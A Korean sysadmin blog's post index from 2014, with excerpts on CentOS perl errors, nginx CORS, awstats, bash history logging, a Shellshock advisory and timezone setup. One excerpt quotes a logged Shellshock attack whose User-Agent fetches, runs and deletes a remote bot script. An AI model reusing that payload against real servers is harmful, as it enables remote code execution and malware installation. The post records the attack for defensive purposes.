BEGIN failed–compilation aborted admin 2014.11.07 centos perl 실행시 에러 yum install perl-ExtUtils-CBuilder perl-ExtUtils-MakeMaker perl -MCPAN -e shell 실행 에러시 yum -y install perl-Shell-Perl Read More..
nginx Access-Control-Allow-Origin * admin 2014.11.03 vi nginx.conf location ~* ^.*\.(ico|css|js|gif|jp?g|png|svg|bmp|eot|ttf|woff|otf|woff2){ add_header Access-Control-Allow-Origin “*”; access_log off; expires max; # break; } vi mime.type [crayon-6741b62b24194118439208/] Read More..
+ awstats 설치 admin 2014.10.08 웹로그 분석 시스템은 다양은 오픈소스가 존재 한다. webalizer / awstats / goaccess 등 여러가지 존재하는데 이중에서 awstats 를 설치 해보자 OS : CentOS 7.x Web Server : apache 2.4 1. 다운로드 ( 다운로드는 공식 홈페이지에서 다운로드 가능 https://awstats.sourceforge.io/ ) 및 폴더 변경 [crayon-6741b62b25499896498083/] 2. 사용자 환경 config 파일 생성 [crayon-6741b62b254ab351882520/] 3. awstats 환경설정 파일 수정 [crayon-6741b62b254b4659233861/] 4. 이제 모든 설정이 완료되었으므로 로그 파일을 awstats 에 맞게 파싱... Read More..
history 로그로 남기기 admin 2014.10.01 간혹 엔지니어 중에 history 를 수정하거나 삭제 한 후 자기 자신은 작업을 하지 않았다는 등 ㅜㅜ 그러한 이유로 작업자의 ip 및 명령어를 로그에 남기도록 해보자 vi /etc/profile ####### sulinux 2014 command history function history_to_syslog { declare command remoteaddr=”who am i” command=$(fc -ln -0) if [ “$command” != “$old_command” ]; then logger -p local1.notice -t bash -i ? “$USER : $remoteaddr” : “$command” fi ... Read More..
+ bash 웹을 이용한 서버 해킹 시도 admin 2014.09.29 218.145.31.50 219.232.239.33 – – [29/Sep/2014:08:48:15 +0900] “GET / HTTP/1.0” 200 238 “-” “() { :;}; /bin/bash -c \”wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\”” 218.145.31.50 – Read More..
bash 취약점 (임의코드 실행취약점 보안업데이트 권고) admin 2014.09.26 개요 • 리눅스계열등운영체제에서사용중인GNU Bash에서발생하는임의코드실행취약점(CVE-2014-6271) 보안업데이트를우회하여악용할수있는취약점발생(CVE-2014-7169) • 공격자는해당취약점이존재하는시스템을대상으로원격에서악의적인시스템명령을실행시킬수있으므로 해결방안에따라보안업데이트적용권고 해당시스템 • 영향받는시스템 ◦GNU Bash를사용하는시스템 해결방안 • 해당취약점에대한보안업데이트가공개된OS를운영하고있을경우, 참고사이트의내용을참조하여 보안업데이트수행 ◦CentOS[1] ◦Debian[2] ◦Redhat[3] ◦Ubuntu [4] 용어정리 • Shell : 사용자가입력한문장을해석하여시스템기능을수행하는명령어해석기 기타문의사항 • 한국인터넷진흥원인터넷침해대응센터: 국번없이118 [참고사이트] [1] ht... Read More..
CENTOS 창 크기 변환시 로그아웃 되는 문제 admin 2014.09.26 CENTOS 5.X / 6.X 버전 모두 해킹된 서버를 확인해보면 CRT 창을 변환시키면 로그아웃이 되는 문제가 발생한다 우선 login 파일이 어느 패키지 파일인지 확인하다 rpm -qf /bin/login rpm -qV util-linux-ng-2.17.2-12.9.el6.x86_64 이렇게 했을때 여러개가 나오는경우 해당 파일은 변조된것이다. 이것만 따로 삭제(강제)하고 다시 설치해 준다 Read More..
+ CENTOS scout realtime ( 웹페이지 서버 상태 체크) admin 2014.09.12 환경은 cents 6.x [crayon-6741b62b3c3f4029014293/][crayon-6741b62b3c406535493088/][crayon-6741b62b3c40f392189317/][crayon-6741b62b3c417299833588/][crayon-6741b62b3c41f447766780/][crayon-6741b62b3c426680486060/][crayon-6741b62b3c42d388586845/] Read More..
linux timezone 설정 admin 2014.09.04 AWS 를 설치 하고 나면 몇가지 작업을 해 주어야 합니다. 그 중 하나가 시간을 설정 하는 것입니다. EC2 인스턴스를 생성하고 나면 시간이 서울이 아닌 표준 0 시로 셋팅되어 있습니다. 이 시간 설정은 tzselect 라는 툴을 이용해 간단히 설정 가능 합니다. 먼저 EC2 인스턴스에 콘솔 접속을 해서 tzselect 를 실행시키고 다음과 같이 진행시킵니다. [ec2-user@ ~]$ tzselectPlease identify a location so that time zone rules can be set correctly.Please select a continent or ocean.1) Africa2) Americas3) Antarctica4) Arctic Ocean5) Asia6) Atlantic... Read More..